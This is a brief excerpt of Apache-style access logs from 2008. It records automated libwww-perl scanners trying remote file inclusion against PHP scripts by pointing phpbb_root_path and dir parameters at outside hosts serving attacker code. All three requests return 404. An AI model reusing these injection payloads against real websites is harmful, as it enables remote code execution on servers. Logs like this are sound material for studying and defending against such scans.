216.249.32.13 - - [07/Aug/2008:01:43:03 -0500] "GET /logs//language/lang_german/lang_main_album.php?phpbb_root_path=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.65"
216.249.32.13 - - [07/Aug/2008:01:43:03 -0500] "GET //language/lang_german/lang_main_album.php?phpbb_root_path=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.65"
216.75.35.118 - - [07/Aug/2008:01:43:28 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://aprt.ru/lang/inc? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
